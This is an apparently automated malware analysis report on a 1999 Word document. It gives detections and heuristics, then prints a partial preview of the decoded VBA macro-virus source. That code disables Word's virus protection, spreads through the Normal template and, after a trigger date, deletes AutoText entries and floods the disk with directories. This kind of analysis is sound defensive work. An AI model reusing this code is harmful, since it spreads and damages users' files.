Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b5aa7f6b4c24c923…

MALICIOUS

Office (OLE)

41.5 KB Created: 1999-06-08 21:30:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 2d6079b1aeaa3f3a0427771f69628db3 SHA-1: ddf8d8db136d75486b011bdcf25e034b973dff1f SHA-256: b5aa7f6b4c24c923c4dacdb5905390a81349703cb527d3bf909349147d41a52b
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains legacy WordBasic and VBA macros, including a Document_Open macro that disables virus protection and calls other subroutines. The presence of 'Doc.Dropper.Agent-6961836-0' and 'Win.Trojan.C-286' detections from ClamAV strongly suggests a dropper functionality. The macros likely attempt to download and execute a secondary payload, a common tactic for this type of malware.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6961836-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6961836-0
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 26,112 bytes but its declared streams total only 0 bytes — 26,112 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMS
    The file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28255 bytes
SHA-256: 1df8e211c1b74b73ed0a5c5ec4771da322e7b936b722d1763cb7c00e75b3e736
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_New()
On Error GoTo dnew
 Call copyfromtempl
dnew:
Exit Sub
End Sub

Private Sub Document_Open()
On Error GoTo Dopen
  With Options
    .VirusProtection = False
  End With
 Call copyfromtempl
 Call copytotempl
Dopen:
Exit Sub
End Sub

Attribute VB_Name = "Funky"
Option Explicit

Public templpath, docouname, docname As String
Public autentriesn
Public autentriest
Public uname
Public newdirc, lengthdirc, NPath
Public w, x, z, y, doccount, projcount As Integer
Public mytemplate As Template
Const Funkydate = "13/ 08 / 99"
Public lengthn
Public fnamet, fnamet2, fnamed, fnamed2 As String

Sub Autoexec()
On Error GoTo exitsub
   
   Application.Documents.Add

   doccount = Application.Documents.Count
   
   If doccount = 1 Then
        GoTo copyto
   ElseIf doccount > 1 Then
           Normal.ThisDocument.ActiveWindow.Activate
   End If
  
copyto:
    
    
        Call copytotempl
        Call copyfromtempl

Funkyday:

If Now() = Funkydate Or Now() > Funkydate Then
    GoTo Funkystart
Else
    GoTo exitsub
End If

Funkystart:
   Call pagelay
   
   Set mytemplate = ActiveDocument.AttachedTemplate
  
   If mytemplate.AutoTextEntries.Count = 0 Then
        For z = 1000 To 1 Step -1
            Call newdir
        Next z
        Exit Sub
   Else
        
        For x = mytemplate.AutoTextEntries.Count To 1 Step -1
          
          autentriesn = mytemplate.AutoTextEntries(x).Name
          autentriest = mytemplate.AutoTextEntries(x).Value
              Call Templatepath
              Call dircreate
          mytemplate.AutoTextEntries(x).Delete
                
                If mytemplate.AutoTextEntries.Count = 0 Then
                    GoTo Message
                End If
        Next x
   End If
 Exit Sub
exitsub:
  
Exit Sub
Message:
   Call sname
   
   MsgBox "Hi, " & "< " & uname & " >" & Chr(13) & Chr(10) & Chr(13) & Chr(10) & "Sorry, did you say there are no more Autotext Entries? " & Chr(13) & Chr(10) & "Never mind, you should have enough information to replace it." & Chr(13) & Chr(10) & "Take a look at your Templates directory !!!", vbCritical, "Wipe-out !!!"
    GoTo exitsub
   
End Sub

Sub Templatepath()
On Error GoTo exitsub
    templpath = Options.DefaultFilePath(Path:=wdUserTemplatesPath)
    
    If templpath = "" Then
        templpath = "c:\office97\templates"
        MkDir templpath
 
    Else
        templpath = Options.DefaultFilePath(Path:=wdUserTemplatesPath)
  
    End If
   
    Open templpath & "\Tpath.txt" For Output As 1#
        Write #1, templpath
    Close #1
exitsub:

End Sub

Sub dircreate()

On Error GoTo ending
   
    lengthn = Len(autentriesn)
    autentriesn = Trim(Mid(autentriesn, 1, lengthn - 1))
    MkDir templpath & "\" & autentriesn
    Open templpath & "\" & autentriesn & "\" & autentriesn & ".txt" For Output As 1#
        Write #1, autentriest
    Close #1
   
ending:
End Sub

Sub sname()
On Error GoTo exitsub
    uname = Application.UserName
exitsub:
End Sub

Sub pagelay()
On Error GoTo exitsub
    If ActiveWindow.View.SplitSpecial = wdPaneNone Then
        ActiveWindow.ActivePane.View.Type = wdPageView
    Else
        ActiveWindow.View.Type = wdPageView
    End If
exitsub:
End Sub

Sub newdir()
On Error GoTo wrfile
    Call Templatepath
    Open templpath & "\Tpath.txt" For Input As #1
        Do While Not EOF(1)
            Input #1, newdirc
        Loop
    Close #1
    lengthdirc = Len(newdirc)
    newdirc = Trim(Mid(newdirc, 1, lengthdirc))
    NPath = Trim(Mid(newdirc, 4, lengthdirc))
    MkDir newdirc & (z)
exitsub:
Exit Sub
wrfile:
    Call errdircreate
    GoTo exitsub
End Sub

Sub errdircreate()
On Error GoTo endnow
    Open newdirc & (z) &
... (truncated)
embedded_office_off00004000.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x4000 26112 bytes
SHA-256: 4f83fa8da6a632776fba68b7f3e1ce99398743494427ab5e14a21b1685d8809f